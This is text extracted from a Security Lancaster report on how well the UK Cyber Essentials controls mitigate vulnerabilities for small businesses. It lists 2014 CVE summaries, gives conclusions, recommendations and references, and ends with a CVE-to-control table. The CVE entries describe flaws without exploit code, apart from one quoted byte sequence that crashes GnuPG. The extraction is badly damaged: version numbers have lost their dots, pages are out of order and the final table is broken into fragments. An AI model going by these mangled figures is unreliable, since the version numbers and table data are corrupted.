CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
